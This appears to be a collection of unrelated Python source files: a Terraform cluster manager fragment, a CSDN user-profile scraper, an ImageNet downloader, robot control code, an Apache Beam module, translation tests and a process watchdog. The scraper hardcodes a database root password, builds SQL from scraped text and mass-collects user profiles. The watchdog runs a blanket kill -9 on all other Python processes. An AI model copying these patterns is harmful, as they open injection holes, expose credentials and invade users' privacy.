else ClusterStatusCode.DESTROY_RUNNING
)
def terraform_apply(destroy: bool):
try:
self.__rotate_terraform_logs(apply=True)
with open(
self.__get_cluster_path(TERRAFORM_APPLY_LOG_FILENAME), "w"
) as output_file:
environment_variables = environ.copy()
dns_manager = DnsManager(self.get_domain())
environment_variables.update(
dns_manager.get_environment_variables()
)
environment_variables["OS_CLOUD"] = DEFAULT_CLOUD
if destroy:
environment_variables["TF_WARN_OUTPUT_ERRORS"] = "1"
run(
[
"terraform",
"apply",
"-input=false",
"-no-color",
"-auto-approve",
self.__get_cluster_path(TERRAFORM_PLAN_BINARY_FILENAME),
],
cwd=self.__get_cluster_path(),
stdout=output_file,
stderr=output_file,
check=True,
env=environment_variables,
)
with DatabaseManager.connect() as database_connection:
self.__database_connection = database_connection
if destroy:
# Removes the content of the cluster's folder, even if not empty
rmtree(self.__get_cluster_path(), ignore_errors=True)
self.__database_connection.execute(
"DELETE FROM magic_castles WHERE hostname = ?",
(self.get_hostname(),),
)
self.__database_connection.commit()
else:
self.__update_status(ClusterStatusCode.PROVISIONING_RUNNING)
if not destroy:
provisioning_manager = ProvisioningManager(self.get_hostname())
# Avoid multiple threads polling the same cluster
if not provisioning_manager.is_busy():
try:
provisioning_manager.poll_until_success()
status_code = ClusterStatusCode.PROVISIONING_SUCCESS
except PuppetTimeoutException:
status_code = ClusterStatusCode.PROVISIONING_ERROR
with DatabaseManager.connect() as database_connection:
self.__database_connection = database_connection
self.__update_status(status_code)
except CalledProcessError:
logging.info("An error occurred while running terraform apply.")
with DatabaseManager.connect() as database_connection:
self.__database_connection = database_connection
self.__update_status(
ClusterStatusCode.DESTROY_ERROR
if destroy
else ClusterStatusCode.BUILD_ERROR
)
finally:
with DatabaseManager.connect() as database_connection:
self.__database_connection = database_connection
self.__remove_existing_plan()
destroy = self.get_plan_type() == PlanType.DESTROY
terraform_apply_thread = Thread(target=terraform_apply, args=(destroy,))
terraform_apply_thread.start()
def __remove_existing_plan(self):
try:
self.__update_plan_type(PlanType.NONE)
# Remove existing plan, if it exists
remove(self.__get_cluster_path(TERRAFORM_PLAN_BINARY_FILENAME))
remove(self.__get_cluster_path(TERRAFORM_PLAN_JSON_FILENAME))
except FileNotFoundError:
# Must be a new cluster, without existing plans
pass
def __get_plan(self):
try:
with open(
self.__get_cluster_path(TERRAFORM_PLAN_JSON_FILENAME), "r"
) as plan_file:
plan_object = json.load(plan_file)
return plan_object
except (FileNotFoundError, json.decoder.JSONDecodeError):
return None
|
userspider.py
|
# -*- coding=utf-8 -*-
import threading
import time, requests, random, sys, codecs
import MySQLdb
import math
from bs4 import BeautifulSoup
# 代理
from utils.myutils import spider
# 数据库更新语句执行操作
def sql_opt(sql):
db = MySQLdb.connect("localhost", "root", "123456789", "db_csdn_user",
charset='utf8')
cursor = db.cursor()
try:
cursor.execute(sql)
db.commit()
except Exception as e:
print("----sql_opt数据库语句执行异常" + str(e))
db.rollback()
db.close()
# 数据库分表
def sjkfb(table):
db = MySQLdb.connect("localhost", "root", "123456789", "db_csdn_user",
charset='utf8')
cursor = db.cursor()
for index in range(1, 5):
table_name = table + "_" + str(index)
table_check_sql = "select COUNT(id) from " + table_name
cursor.execute(table_check_sql)
check_results = cursor.fetchall()
if check_results[0][0] < 2000000: # 每200W数据分一次表
return table_name
db.close()
# 用户信息的插入
def user_insert(username, insert_base, insert_blog, insert_relation, user_list):
db = MySQLdb.connect("localhost", "root", "123456789", "db_csdn_user",
charset='utf8')
cursor = db.cursor()
try:
print("---用户数据插入:" + username)
cursor.execute(insert_base)
cursor.execute(insert_blog)
cursor.execute(insert_relation)
db.commit()
except Exception as e:
print("---用户信息插入sql执行异常:" + username + str(e))
db.rollback()
user_sql = "select username from t_user_list"
cursor.execute(user_sql)
username_results = cursor.fetchall()
for row in username_results:
if row[0] in user_list:
user_list.remove(row[0])
for user in user_list:
insert_sql = "INSERT INTO `t_user_list` (`username`) VALUES ('%s')" % (user)
try:
print("--用户列表插入:" + user)
cursor.execute(insert_sql)
db.commit()
except Exception as e:
print("--用户列表插入sql执行异常:" + user + str(e))
db.rollback()
db.close()
# me个人页面解析
def me_page_parse(username, times=0):
url = "https://me.csdn.net/blog/" + username
times += 1
if (times > 6):
error_sql = "UPDATE `t_user_list` SET `flag`='error' WHERE (`username`='%s')" % (username)
sql_opt(error_sql)
return
response = spider(url)
if response:
try:
web_html = response.text
soup = BeautifulSoup(web_html, 'lxml')
nickname = soup.select("p.lt_title")[0].get_text().replace("\n", "").replace(" ", "").replace("\'", "\\'")[
1:]
description = soup.select("p.description_detail")
if len(description) > 0:
description = description[0].get_text().replace("\n", "").replace(" ", "").replace("\'", "\\'")
else:
description = "无"
tab_item = soup.select("span.count ")
rank = str(soup.select("div.me_chanel_det > div.access > span")[1].get_text()) \
.replace("\n", "").replace(" ", "")
if len(tab_item) >= 6:
blog = tab_item[0].get_text().replace("\n", "").replace(" ", "")
download = tab_item[1].get_text().replace("\n", "").replace(" ", "")
bbs = tab_item[2].get_text().replace("\n", "").replace(" ", "")
blink = tab_item[3].get_text().replace("\n", "").replace(" ", "")
ask = tab_item[4].get_text().replace("\n", "").replace(" ", "")
myfavorite = tab_item[5].get_text().replace("\n", "").replace(" ", "")
fans = soup.select("div.fans > a > span")[0].get_text().replace("\n", "").replace(" ", "")
follow = soup.select("div.att > a > span")[0].get_text().replace("\n", "").replace(" ", "")
user_base_insert_sql = "INSERT INTO `" + sjkfb("t_user_base") + "` (`username`, `nickname`, `description`" \
", `download`, `bbs`, `blink`, `ask`,`myfavorite`) " \
"VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s','%s')" \
% (username, nickname, description, download, bbs, blink, ask, myfavorite)
user_blog_insert_sql = "INSERT INTO `" + sjkfb("t_user_blog") + "` (`username`, `blog`, `rank`) " \
"VALUES ('%s', '%s', '%s')" \
% (username, blog, rank)
user_relation_insert_sql = "INSERT INTO `" + sjkfb("t_user_relation") + "` (`username`, `fans`, `follow`) " \
"VALUES ('%s', '%s', '%s')" \
% (username, fans, follow)
new_user_list = ["csdnnews"]
if int(fans) > 0:
new_user_list.extend(fans_page_parse(username))
if int(follow) > 0:
new_user_list.extend(follow_page_parse(username))
new_user_list = list(set(new_user_list))
user_insert(username, user_base_insert_sql, user_blog_insert_sql, user_relation_insert_sql, new_user_list)
except Exception as e:
print("--用户信息解析处理失败异常:" + username + str(e))
error_sql = "UPDATE `t_user_list` SET `flag`='error' WHERE (`username`='%s')" % (username)
sql_opt(error_sql)
else:
me_page_parse(username, times)
# fans页面解析
def fans_page_parse(username, times=0):
url = "https://me.csdn.net/fans/" + username
times += 1
if (times > 6):
error_sql = "UPDATE `t_user_list` SET `flag`='error' WHERE (`username`='%s')" % (username)
sql_opt(error_sql)
return
response = spider(url)
if response:
try:
web_html = response.text
soup = BeautifulSoup(web_html, "lxml")
fans_page_list = soup.select("p.user_name > a")
fans_list = []
if len(fans_page_list) > 0:
for fan in fans_page_list:
fansname = str(fan['href'])
fansname = fansname[fansname.rfind("/") + 1:]
fans_list.append(fansname)
return fans_list
except Exception as e:
print("---粉丝页面解析异常" + username + str(e))
else:
fans_page_parse(username, times)
# follow页面解析
def follow_page_parse(username, times=0):
url = "https://me.csdn.net/follow/" + username
times += 1
if (times > 6):
error_sql = "UPDATE `t_user_list` SET `flag`='error' WHERE (`username`='%s')" % (username)
sql_opt(error_sql)
return
response = spider(url)
if response:
try:
web_html = response.text
soup = BeautifulSoup(web_html, "lxml")
follow_page_list = soup.select("p.user_name > a")
follow_list = []
if len(follow_page_list) > 0:
for fan in follow_page_list:
followname = str(fan['href'])
followname = followname[followname.rfind("/") + 1:]
follow_list.append(followname)
return follow_list
except Exception as e:
print("---关注页面解析异常" + username + str(e))
else:
follow_page_parse(username, times)
# 方法弃置不用
def cf_check():
db = MySQLdb.connect("localhost", "root", "123456789", "db_csdn_user",
charset='utf8')
cursor = db.cursor()
cf_check_sql = "SELECT COUNT(*) FROM(select id from t_user_list WHERE flag = '0' GROUP BY username HAVING COUNT(username) > 1) alias"
cd_handler = "DELETE FROM t_user_list WHERE id in (SELECT id FROM(select id from t_user_list WHERE flag = '0' GROUP BY username HAVING COUNT(username) > 1) alias)"
cursor.execute(cf_check_sql)
check_results = cursor.fetchall()
while check_results[0][0] != 0:
try:
cursor.execute(cd_handler)
db.commit()
except Exception as e:
print(str(e))
db.rollback()
cursor.execute(cf_check_sql)
check_results = cursor.fetchall()
db.close()
# 用户信息爬虫控制
def user_controleer():
# cf_check()
# print("重复检测结束")
db = MySQLdb.connect("localhost", "root", "123456789", "db_csdn_user",
charset='utf8')
cursor = db.cursor()
user_select_sql = "SELECT username FROM `t_user_list` WHERE flag = '0' limit 20"
user_update_sql = "UPDATE `t_user_list` SET `flag`='1' WHERE flag = '0' limit 20" # 每次从数据库中取完然后更新数据库
cursor.execute(user_select_sql)
username_results = cursor.fetchall()
try:
print("-用户提取更新", username_results)
cursor.execute(user_update_sql)
db.commit()
except Exception as e:
print("-用户提取更新sql执行异常:" + str(e))
db.rollback()
db.close()
threads = []
for row in username_results:
thread = threading.Thread(target=me_page_parse, args=[row[0]])
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
i = 0
while True:
start_time = time.time()
print("=====================================" + str(i) + "======================")
try:
user_controleer()
except Exception as e:
print(str(e))
time.sleep(60)
i += 1
print("=====================================" + str(time.time() - start_time) + "======================")
time.sleep(5)
|
dl-imgnet.py
|
#! /bin/env python3
""" Helper script to download image-net.org image corresponding
to a given ID.
Author: Patrice FERLET <metal3d@gmail.com>
Licence: MIT
"""
import requests
import os
import hashlib
import imghdr
import io
import queue
import threading
import multiprocessing
import sys
CPUs = multiprocessing.cpu_count()
# LIST_URL =
# 'http://image-net.org/api/text/imagenet.synset.geturls?wnid={imid}'
LIST_URL = ''.join([
'http://www.image-net.org/',
'api/text/imagenet.synset.geturls.getmapping?wnid={imid}'])
SEE_URL = 'http://www.image-net.org/synset?wnid={id}'
# not wanted images, mainly for flickr bad file, hugedomain logos...
BADIMG = [
'880a7a58e05d3e83797f27573bb6d35c', # flickr
'596246739a83bb45e30e13437e0810d9', # warning sign
'969e595182a947c7fdaaef4a34401760', # forbiden sign
'af5db09e39ca35d8930b4e59962e09e5', # hugedomain logo
]
TIMEOUT = 5
DEST = './'
DATAFILE = './data.csv'
q = None
locker = threading.Lock()
def init_queue(number: int = CPUs):
""" Initiate Queue to that number of elements """
global q
if q is None:
print("Initializing Queue to %d workers" % number)
q = queue.Queue(number)
else:
print('Queue already initialized')
def get_list(imid: str) -> requests.Response:
""" Return the requests.Response containing
the list of images for a given image-net.org
collection ID.
"""
imlist = requests.get(LIST_URL.format(imid=imid))
return imlist
def logthat(content, total=None, index=None):
""" Helper function to write logs
with progression status.
"""
if total is not None and index is not None:
print('%d/%d %s' % (index+1, total, content))
else:
print('%s' % content)
def save_data(imname: str, url: str, classname: str, nid: str):
locker.acquire()
if not os.path.exists(DATAFILE):
try:
# append header line
with open(DATAFILE, 'a') as f:
f.write('Sysnet Name,Base URL,Classname,Imagenet ID\n')
except Exception as e:
print(e)
sys.exit(0)
try:
with open(DATAFILE, 'a') as f:
f.write('"%s",%s,"%s",%s\n' % (imname, url, classname, nid))
except Exception as e:
print(e)
finally:
locker.release()
def is_in_db(imname: str):
""" Fetch given url in CSV file and return boolean
saying if the file is already downloaded.
"""
locker.acquire()
try:
lines = open(DATAFILE).readlines()
except Exception:
return False
finally:
locker.release()
for l in lines:
if imname in l:
return True
return False
def dl_image(
imname: str,
imurl: str,
classname='unknown',
dest='./',
total=None,
index=None,
nid=None):
""" Download image from the given url, save it as classname
and check if the image is correct.
"""
# imname = os.path.basename(imurl)
# imname = imname.decode()
# prepare the desitnation directory
os.makedirs(os.path.join(dest, classname), exist_ok=True)
# deactivate, use md5
# if os.path.exists(fileto):
# print('File %s already downloaded, skippiing' % fileto)
# return
# check if image is in csv database
if is_in_db(imname):
logthat('Image already downloaded, skipping', total, index)
return
# download image, and check status_code
try:
im = requests.get(imurl, timeout=TIMEOUT)
if im.status_code != 200:
logthat(
'Status code is not OK for %s, %d' % (
imurl, im.status_code),
total,
index
)
return
except Exception as e:
logthat(
'Error, connot download %s %s' % (imurl, e),
total,
index
)
return
# is it a valid image ?
b = io.BytesIO()
b.write(im.content)
b.seek(0)
ext = imghdr.what(b)
if ext is None:
logthat(
"%s seems to not be a valid image file, skipping" % imname,
total,
index
)
return
# is it a bad image ?
md5 = hashlib.md5(im.content).hexdigest()
if md5 in BADIMG:
logthat(
imname + ' md5 corresponds to a bad image, skipping',
total,
index)
return
fileto = os.path.join(dest, classname, imname + '.' + ext)
# md5 is ok, downloaded file is not empty, we can save it
with open(fileto, 'wb') as f:
f.write(im.content)
save_data(imname, imurl, classname, nid)
logthat("%s file saved" % imname, total, index)
def task_download():
""" Helper function that is launched by threading.Thread.
It reads Queue and call dl_image() in parallel.
"""
init_queue()
while True:
imname, item, classname, total, index, nid = q.get()
if item is None:
break
dl_image(imname, item, classname, DEST, total, index, nid)
q.task_done()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'nid',
help='Id of the imagenet group to download. '
'It can be a coma separated of ids. It\'s an optionnal '
'argument, if leaved empty, so a search is made on imagenet '
'with the class name argument and nothing is downloaded.',
nargs='?'
)
parser.add_argument(
'name',
help='Real classname of the images to '
'download (it will create the corresponding directory name)'
)
parser.add_argument(
'-d',
'--dest',
help='destination root (without classname) directory '
'where images will be downloaded',
default=DEST
)
parser.add_argument(
'-t',
'--timeout',
type=int,
help='Timeout in seconds for requests before to abandon download',
default=TIMEOUT
)
parser.add_argument(
'-n',
'--num-worker',
type=int,
help='Number of worker for parallel '
'download, use number of cpus by default',
default=CPUs
)
parser.add_argument(
'-c',
'--csv',
type=str,
help='CSV file where to keep downloaded file information',
default=DATAFILE
)
args = parser.parse_args()
nids = args.nid
classname = args.name
NUM_WORKERS = args.num_worker
TIMEOUT = args.timeout
DEST = args.dest
DATAFILE = args.csv
if args.nid is None:
# get words
nids = []
words = requests.get('http://image-net.org/archive/words.txt')
print('You didn\'t provide ID, choose in the list')
for line in words.iter_lines():
nid, terms = line.decode().split('\t')
for n in classname.split(','):
if n in terms:
print(
nid,
terms,
"See results at: %s" % SEE_URL.format(id=nid)
)
sys.exit(0)
init_queue(NUM_WORKERS)
threads = []
for i in range(NUM_WORKERS):
t = threading.Thread(target=task_download)
t.start()
threads.append(t)
lines_count = 1
results = {}
for nid in nids.split(','):
nid = nid.strip()
res = get_list(nid)
# list is not very well formatted, we need
# to iterate to count, and not find "\n" or whatever
# the line delimiter
for _ in res.iter_lines():
lines_count += 1
results[nid] = res
lastidx = 0
for nid, res in results.items():
for u in res.iter_lines():
u = u.decode().split(' ')
if len(u) == 2:
imname, u = list(u)
else:
continue
q.put((imname, u, classname, lines_count, lastidx, nid))
lastidx += 1
q.join()
for i in range(NUM_WORKERS):
q.put((None, None, None, None, None, None))
for t in threads:
t.join()
|
action_manager.py
|
import json
import logging
import threading
import time
from collections import deque
from typing import (Any, Callable, Deque, Dict, List, Tuple, cast)
from actions.commands.auto_refill import AutoRefillCommand
from actions.commands.get_gripsense import GetGripsenseCommand
from actions.commands.get_position import GetPositionCommand
from actions.commands.get_settings import GetSettingsCommand
from actions.commands.get_water_level import GetWaterLevelCommand
from actions.commands.home import HomeCommand
from actions.commands.move import MoveCommand
from actions.commands.pause import PauseCommand
from actions.commands.scan_rfid import ScanRFIDCommand
from actions.commands.set_magnet import SetMagnetCommand
from actions.commands.set_position import SetPositionCommand
from actions.commands.set_pumps import SetPumpsCommand
from actions.commands.set_settings import SetSettingsCommand
from actions.commands.side_camera import SideCam
from actions.commands.tare import TareCommand
from actions.commands.top_camera import TopCam
from actions.commands.water import WaterCommand
from actions.commands.weight import WeightCommand
from actions.errors.error_handler import ErrorHandler
from actions.feedback.feedback_manager import FeedbackManager
from actions.feedback.idle_handler import IdleHandler
from actions.memory import Memory
from common.Interval import Interval
from common.config import Config
from common.enums import State
from common.log_event import Logger
from common.mqtt_client import MQTT
from common.redis_client import Redis
from common.serial_manager import SerialManagerAbstract
from common.types import Command, Instruction, ErrorHandlerFactoryFunc
from util import Try
class ActionManager:
def __init__(self, serial: SerialManagerAbstract, mqtt: MQTT, redis: Redis, config: Config,
logger: Logger) -> None:
self._config: Config = config
self._logger: Logger = logger
self._serial: SerialManagerAbstract = serial
self._mqtt: MQTT = mqtt
self._redis: Redis = redis
self._memory: Memory = Memory()
self._feedback_manager: FeedbackManager = FeedbackManager(self._memory, mqtt, serial, redis, config, logger)
self._error_handler: ErrorHandler = ErrorHandler(self._memory, self._feedback_manager, self._serial, redis,
config, logger, self.cancel_all_actions)
self._debug_only: bool = config.debug_only_serialless
self._queue: Deque[Tuple[Instruction, Command]] = deque()
self._resolver: Dict[int,
Callable[[Instruction,
Command,
ErrorHandlerFactoryFunc,
FeedbackManager,
Memory,
Redis,
SerialManagerAbstract,
Config,
Logger,
bool,
bool],
bool]] = \
{
0: MoveCommand.run,
1: WeightCommand.run,
2: WaterCommand.run,
3: PauseCommand.run,
6: ScanRFIDCommand.run,
7: HomeCommand.run,
8: SetPositionCommand.run,
9: GetPositionCommand.run,
12: GetSettingsCommand.run,
13: SetSettingsCommand.run,
15: GetGripsenseCommand.run,
16: GetWaterLevelCommand.run,
17: SetMagnetCommand.run,
20: AutoRefillCommand.run,
21: SetPumpsCommand.run,
22: TareCommand.run,
100: TopCam.open,
101: TopCam.take_image,
102: TopCam.close,
105: SideCam.open,
106: SideCam.take_image,
107: SideCam.close,
255: self.cancel_all_actions
}
self._dependencies: List[Any] = [
self._feedback_manager,
self._memory,
self._redis,
self._serial,
self._config,
self._logger
]
state: State = self._redis.get_current_state()
logger.create_event(f'Startup fresh {self._config.robot_id}', robot_id=self._config.robot_id)
HomeCommand.run({}, {'val': [7, 1, 0, 0, 0, 0, 0, 80]}, self._error_handler.get_handler,
*self._dependencies, fatal=True)
HomeCommand.run({}, {'val': [7, 1, 0, 0, 0, 0, 0, 20]}, self._error_handler.get_handler,
*self._dependencies, fatal=True)
HomeCommand.run({}, {'val': [7, 0, 0, 0, 0, 1, 0, 20]}, self._error_handler.get_handler,
*self._dependencies, fatal=True)
HomeCommand.run({}, {'val': [7, 0, 0, 2, 0, 0, 0, 80]}, self._error_handler.get_handler,
*self._dependencies, fatal=True)
HomeCommand.run({}, {'val': [7, 0, 0, 2, 0, 0, 0, 20]}, self._error_handler.get_handler,
*self._dependencies, fatal=True)
logger.send_event(logging.INFO)
if State.has_state(state, State.HANDLING_INSTRUCTION):
if not self._redis.get_log_item_state(logger):
logger.create_event('Unknown', robot_id=self._config.robot_id)
instruction, command = self._redis.get_current_action()
details = {
'statusCode': 'HorizontalBotRebootError',
'message': 'Horizontal Robot rebooted while busy'
}
logger.log_system(logging.ERROR, details['message'])
logger.add_to_event(statusCode=details['statusCode'], error_message=details['message'])
logger.send_event(logging.ERROR)
self._feedback_manager.send_to_gateway(instruction, command, self._memory, details)
self._redis.set_state(State.IDLE)
TopCam.setup(self._mqtt, self._logger, self._config)
SideCam.setup(self._mqtt, self._logger, self._config)
threading.Thread(target=self.handle_action_queue, daemon=True).start()
def start_handling_instructions(self) -> None:
def handle_instruction(topic: str, payload: str, **kwargs: str) -> None:
self._redis.update_state(State.add_state, State.HANDLING_INSTRUCTION)
self._logger.log_system(logging.INFO, 'Received: ' + json.dumps(json.loads(payload), indent=4))
actions = json.loads(payload)
self._logger.create_event('start handling instruction', robot_id=self._config.robot_id,
id=actions['Instruction']['instructionId'], type=actions['Instruction']['type'])
for command in actions['Commands']:
command['val'] = cast(str, command['Str']).split(' ')
self.parse_and_handle_action(actions['Instruction'], command)
self._mqtt.subscribe(f'rc/{self._config.stage}/robots/{self._config.robot_id}/cmds', handle_instruction)
def parse_and_handle_action(self, instruction: Instruction, action: Command) -> None:
self._queue.appendleft((instruction, action))
# Todo: look over it again
def handle_action_queue(self) -> None:
self._logger.log_system(logging.INFO, 'Start handling action queue')
idle_handler = IdleHandler(self._mqtt, self._config.stage, self._config.farm_id, self._config.robot_id,
self._logger)
water_level_command = GetWaterLevelCommand(self._serial)
get_position_command = GetPositionCommand(self._serial)
interval = Interval(self._config.idle_time_sec, idle_handler.send_message,
lambda: (self._redis.get_current_action(), Try(water_level_command.get_water_level),
Try(get_position_command.get_position)))
while True:
if len(self._queue) == 0:
time.sleep(2)
continue
instruction, current_action = self._queue[-1]
self._redis.set_current_action(instruction, current_action)
self._queue.pop()
id = instruction.get('instructionId', 'No instruction id')
instruction_type = instruction.get('type', 'No instruction type')
self._logger.log_system(
logging.INFO, f'Current Action [{instruction_type}|{id}]:\n{json.dumps(current_action, indent=4)}')
current_action_type = int(current_action['val'][0])
if current_action_type not in self._resolver:
self._logger.log_system(logging.ERROR, f'ActionType {current_action_type} not implemented -> skip!')
continue
if current_action and self._resolver[current_action_type](instruction, current_action,
self._error_handler.get_handler,
*self._dependencies):
self._logger.log_system(logging.INFO, 'Ready for next Action')
else:
self._logger.log_system(logging.ERROR, 'Error of command, deleting actions.')
if self._redis.get_current_state() != State.IDLE:
interval.reset()
def cancel_all_actions(self,
instruction: Instruction,
action: Command,
error_handler_factory: ErrorHandlerFactoryFunc,
feedback_manager: FeedbackManager,
memory: Memory,
redis: Redis,
serial: SerialManagerAbstract,
config: Config,
logger: Logger,
fatal: bool = False,
fatal_recovery: bool = False) -> bool:
self._queue.clear()
return True
|
sideinputs.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Utilities for handling side inputs."""
# pytype: skip-file
from __future__ import absolute_import
import collections
import logging
import queue
import threading
import traceback
from builtins import object
from builtins import range
from apache_beam.coders import observable
from apache_beam.io import iobase
from apache_beam.runners.worker import opcounters
from apache_beam.transforms import window
# This module is experimental. No backwards-compatibility guarantees.
# Maximum number of reader threads for reading side input sources, per side
# input.
MAX_SOURCE_READER_THREADS = 15
# Number of slots for elements in side input element queue. Note that this
# value is intentionally smaller than MAX_SOURCE_READER_THREADS so as to reduce
# memory pressure of holding potentially-large elements in memory. Note that
# the number of pending elements in memory is equal to the sum of
# MAX_SOURCE_READER_THREADS and ELEMENT_QUEUE_SIZE.
ELEMENT_QUEUE_SIZE = 10
# Special element value sentinel for signaling reader state.
READER_THREAD_IS_DONE_SENTINEL = object()
# Used to efficiently window the values of non-windowed side inputs.
_globally_windowed = window.GlobalWindows.windowed_value(None).with_value
_LOGGER = logging.getLogger(__name__)
class PrefetchingSourceSetIterable(object):
"""Value iterator that reads concurrently from a set of sources."""
def __init__(self,
sources,
max_reader_threads=MAX_SOURCE_READER_THREADS,
read_counter=None):
self.sources = sources
self.num_reader_threads = min(max_reader_threads, len(self.sources))
# Queue for sources that are to be read.
self.sources_queue = queue.Queue()
for source in sources:
self.sources_queue.put(source)
# Queue for elements that have been read.
self.element_queue = queue.Queue(ELEMENT_QUEUE_SIZE)
# Queue for exceptions encountered in reader threads; to be rethrown.
self.reader_exceptions = queue.Queue()
# Whether we have already iterated; this iterable can only be used once.
self.already_iterated = False
# Whether an error was encountered in any source reader.
self.has_errored = False
self.read_counter = read_counter or opcounters.NoOpTransformIOCounter()
self.reader_threads = []
self._start_reader_threads()
def add_byte_counter(self, reader):
"""Adds byte counter observer to a side input reader.
Args:
reader: A reader that should inherit from ObservableMixin to have
bytes tracked.
"""
def update_bytes_read(record_size, is_record_size=False, **kwargs):
# Let the reader report block size.
if is_record_size:
self.read_counter.add_bytes_read(record_size)
if isinstance(reader, observable.ObservableMixin):
reader.register_observer(update_bytes_read)
def _start_reader_threads(self):
for _ in range(0, self.num_reader_threads):
t = threading.Thread(target=self._reader_thread)
t.daemon = True
t.start()
self.reader_threads.append(t)
def _reader_thread(self):
# pylint: disable=too-many-nested-blocks
try:
while True:
try:
source = self.sources_queue.get_nowait()
if isinstance(source, iobase.BoundedSource):
for value in source.read(source.get_range_tracker(None, None)):
if self.has_errored:
# If any reader has errored, just return.
return
if isinstance(value, window.WindowedValue):
self.element_queue.put(value)
else:
self.element_queue.put(_globally_windowed(value))
else:
# Native dataflow source.
with source.reader() as reader:
# The tracking of time spend reading and bytes read from side
# inputs is kept behind an experiment flag to test performance
# impact.
self.add_byte_counter(reader)
returns_windowed_values = reader.returns_windowed_values
for value in reader:
if self.has_errored:
# If any reader has errored, just return.
return
if returns_windowed_values:
self.element_queue.put(value)
else:
self.element_queue.put(_globally_windowed(value))
except queue.Empty:
return
except Exception as e: # pylint: disable=broad-except
_LOGGER.error('Encountered exception in PrefetchingSourceSetIterable '
'reader thread: %s', traceback.format_exc())
self.reader_exceptions.put(e)
self.has_errored = True
finally:
self.element_queue.put(READER_THREAD_IS_DONE_SENTINEL)
def __iter__(self):
# pylint: disable=too-many-nested-blocks
if self.already_iterated:
raise RuntimeError(
'Can only iterate once over PrefetchingSourceSetIterable instance.')
self.already_iterated = True
# The invariants during execution are:
# 1) A worker thread always posts the sentinel as the last thing it does
# before exiting.
# 2) We always wait for all sentinels and then join all threads.
num_readers_finished = 0
try:
while True:
try:
with self.read_counter:
element = self.element_queue.get()
if element is READER_THREAD_IS_DONE_SENTINEL:
num_readers_finished += 1
if num_readers_finished == self.num_reader_threads:
return
else:
yield element
finally:
if self.has_errored:
raise self.reader_exceptions.get()
except GeneratorExit:
self.has_errored = True
raise
finally:
while num_readers_finished < self.num_reader_threads:
element = self.element_queue.get()
if element is READER_THREAD_IS_DONE_SENTINEL:
num_readers_finished += 1
for t in self.reader_threads:
t.join()
def get_iterator_fn_for_sources(sources,
max_reader_threads=MAX_SOURCE_READER_THREADS,
read_counter=None):
"""Returns callable that returns iterator over elements for given sources."""
def _inner():
return iter(
PrefetchingSourceSetIterable(
sources,
max_reader_threads=max_reader_threads,
read_counter=read_counter))
return _inner
class EmulatedIterable(collections.Iterable):
"""Emulates an iterable for a side input."""
def __init__(self, iterator_fn):
self.iterator_fn = iterator_fn
def __iter__(self):
return self.iterator_fn()
|
test_translation.py
|
import unittest
import threading
import model_server as ms
import available_models
import time
import requests
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
os.chdir(dir_path[:-5])
class TestTranslation(unittest.TestCase):
"""Starting the translation server here"""
model_server_thread = threading.Thread(target=ms.start_model_server)
print("Starting model server")
model_server_thread.start()
# Wait 3 seconds to start model server
time.sleep(3)
def setUp(self):
"""Set up function for tests. This function is run before every test"""
self.model_server_url = available_models.get_conf()["translate_url"]
self.model_ids = available_models.get_valid_model_ids()
self.translation_text = "Hi I am a test string. How are you today?"
def test_translation_output_type(self):
"""Test if the output of a translation from the translate_text is an TranslatedObject. So this did it return something. And try to translate every id that is
registered in the config file. This is an integration test because we get all the ids from another function."""
print("This is an integration test. Testing getting valid model ids and trying to translate with each id found.")
for model_id in self.model_ids:
translation = ms.translate_text(self.translation_text, self.model_server_url, model_id)
self.assertIsInstance(translation, ms.TranslatedObject, "Function does not return translation object")
def test_translation_output_types(self):
"""Test if the attributes of the TranslatedObject object that is returned by translate_text() are of the right types"""
translation = ms.translate_text(self.translation_text, self.model_server_url, 100)
self.assertIsInstance(translation.tgt, str, "Translation object does not have tgt that is a string")
self.assertIsInstance(translation.src, str, "Translation object does not have src that is a string")
self.assertIsInstance(translation.score, float, "Translation object does not have score that is an int")
def test_non_existing_id(self):
"""Test if the right exception is raised when trying to select a model id in the translate server that is registered not in the config file"""
non_existing_id = 1
while non_existing_id in self.model_ids:
non_existing_id += 1
self.assertRaises(ms.ModelIDNotFoundException, ms.translate_text, text=self.translation_text, url=self.model_server_url, model_id=non_existing_id)
def test_non_valid_url(self):
"""Test to see if the right exception is raised when trying to translate with a url that not the url that points to the translate server """
for model_id in self.model_ids:
self.assertRaises(requests.exceptions.ConnectionError, ms.translate_text, text=self.translation_text, url="https://0.0.0.0", model_id=model_id)
def test_translation_string_length(self):
"""Test if the output of translate_text is longer then 0 and 1 wehn 'Hi I am a test string. How are you today?' is translated"""
self.assertGreater(len(ms.translate_text(self.translation_text, self.model_server_url, 100).tgt), 0, "Return of translation has 0 characters")
self.assertGreater(len(ms.translate_text(self.translation_text, self.model_server_url, 100).tgt), 1,
f"Return of translation of '{self.translation_text}' has only 1 character")
def test_translation_from_audio_file(self):
"""Test if the audio and translation work together"""
print("This is a integration test testing if the audio to text and translation work together")
for model_id in self.model_ids:
text = ms.transcribe_audio("harvard.wav")
translate_object = ms.translate_text(text, self.model_server_url, model_id)
self.assertIsInstance(translate_object, ms.TranslatedObject, "Return of translation has 0 characters")
if __name__ == '__main__':
unittest.main()
TestTranslation.model_server_thread.join()
|
control.py
|
import os
from time import sleep
import json
from multiprocessing import Process
states_json_path = "/workspace/go_proj/src/Ai_WebServer/algorithm_utils/model_states.json"
model_name = "firstOrder"
def run_model_server():
os.system("python run.py")
if __name__ == '__main__':
running = False
while True:
with open(states_json_path,"r",encoding="utf-8")as f:
states = json.load(f)
if states[model_name] and not running:
os.system("ps -ef|grep python|grep -v control|cut -c 9-16|xargs kill -9")
p = Process(target=run_model_server,args=())
p.start()
running = True
elif not states[model_name]:
running = False
sleep(1)
|
AgRec.py
|
#-*- coding: utf-8 -*-
import re
import os
import sys
import requests
